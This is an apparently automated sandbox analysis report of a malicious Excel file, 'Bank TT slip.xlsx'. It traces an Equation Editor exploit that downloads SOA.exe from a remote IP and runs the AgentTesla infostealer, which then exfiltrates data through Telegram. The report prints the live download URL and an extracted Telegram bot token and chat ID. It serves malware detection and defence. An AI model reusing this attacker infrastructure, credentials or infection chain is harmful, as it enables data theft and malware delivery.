Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985108064.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.985373041.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2404, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.245.27.27	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted Domains

Name	IP	Active
api.telegram.org	149.154.167.220	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://172.245.27.27/SOA.exe	true	Avira URL Cloud: malware	unknown

AV Detection

Found malware configuration

Source: 5.0.RegSvcs.exe.400000.4.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1295185895", "Chat URL": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocument"}
Source: vbc.exe.2404.4.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Bank TT slip.xlsx	Metadefender: Detection: 20%			Perma Link
Source: Bank TT slip.xlsx	ReversingLabs: Detection: 31%

Antivirus detection for URL or domain

Source: http://172.245.27.27/SOA.exe	Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exeK	Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeX	Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exehhC:	Avira URL Cloud: Label: malware
Source: Http://172.245.27.27/SOA.exej	Avira URL Cloud: Label: malware
Source: http://172.245.27.27/SOA.exeB	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe	ReversingLabs: Detection: 46%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 46%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.0.RegSvcs.exe.400000.4.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.2.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 5.0.RegSvcs.exe.400000.3.unpack	Avira: Label: TR/Spy.Gen8

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 172.245.27.27 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_036805F7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680658 ShellExecuteExW,ExitProcess,	2_2_03680658
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680592 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03680592
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036804ED ExitProcess,	2_2_036804ED
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680676 ExitProcess,	2_2_03680676
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680641 ShellExecuteExW,ExitProcess,	2_2_03680641
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036805AC URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_036805AC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680522 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03680522
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03680506 URLDownloadToFileW,ShellExecuteExW,ExitProcess,	2_2_03680506

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: api.telegram.org

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49171 -> 172.245.27.27:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 60MB

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 172.245.27.27 172.245.27.27

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_036805F7

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.27.27

Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Http://172.245.27.27/SOA.exeK
Source: EQNEDT32.EXE, 00000002.00000002.962678277.0000000003680000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Http://172.245.27.27/SOA.exej
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.962279454.0000000000320000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exe
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exeB
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exeX
Source: EQNEDT32.EXE, 00000002.00000002.962252708.00000000002E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.27.27/SOA.exehhC:
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bLHfhV.com
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot2134979594:AAFk4QkrlHlt2a-q-EhIoHZBbzxSH0QxiBI/sendDocumentdocument-----
Source: vbc.exe, 00000004.00000002.987730954.000000000341F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984768491.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000000.984407856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.1167403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegSvcs.exe, 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18D80E7.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036805F7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,

2_2_036805F7

Source: global traffic

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

.NET source code contains very large array initializations

Source: 5.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054
Source: 5.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b2F5ED5A7u002d845Cu002d44F8u002dB96Bu002d10B79141A2A8u007d/u003318549B0u002dEE33u002d4898u002dAEAEu002d1AF000D2687D.cs	Large array initialization: .cctor: array initializer size 12054

Yara signature match

Source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.35b1ce0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34c6060.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.1167639054.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: RegSvcs.exe PID: 1452, type: MEMORYSTR	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EB070	4_2_002EB070
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EA8F8	4_2_002EA8F8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9910	4_2_002E9910
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC970	4_2_002EC970
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EF14E	4_2_002EF14E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EBA80	4_2_002EBA80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5440	4_2_002E5440
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E8740	4_2_002E8740
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ED808	4_2_002ED808
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EC959	4_2_002EC959
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EF222	4_2_002EF222
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9A04	4_2_002E9A04
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEA69	4_2_002EEA69
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEA78	4_2_002EEA78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9AB3	4_2_002E9AB3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E9A98	4_2_002E9A98
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE420	4_2_002EE420
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E5430	4_2_002E5430
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EE410	4_2_002EE410
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EECA2	4_2_002EECA2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EECB0	4_2_002EECB0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEF4A	4_2_002EEF4A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002EEF58	4_2_002EEF58
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002ED7F9	4_2_002ED7F9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C64DF	4_2_007C64DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C8DDD	4_2_007C8DDD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C3EF0	4_2_007C3EF0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C43BF	4_2_007C43BF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C0048	4_2_007C0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C3010	4_2_007C3010
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6D78	4_2_007C6D78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C4D79	4_2_007C4D79
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6134	4_2_007C6134
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6D91	4_2_007C6D91
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C4D88	4_2_007C4D88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6E1A	4_2_007C6E1A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C3610	4_2_007C3610
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6B78	4_2_007C6B78
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C6771	4_2_007C6771
Source: C:\Users\Public\vbc.exe	Code function: 4_2_007C7751	4_2_007C7751
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002E178A	4_2_002E178A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00286048	5_2_00286048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00285430	5_2_00285430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00282198	5_2_00282198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00285778	5_2_00285778

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\SOA[1].exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081
Source: Joe Sandbox View	Dropped File: C:\Users\Public\vbc.exe 46584937F3C753886BB38030047DD11C73D46BF01C5E52A95118108634EE2081

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: Bank TT slip.xlsx	Metadefender: Detection: 20%
Source: Bank TT slip.xlsx	ReversingLabs: Detection: 31%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Bank TT slip.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR66EC.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.adwa.expl.evad.winXLSX@6/18@1/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll			Jump to behavior
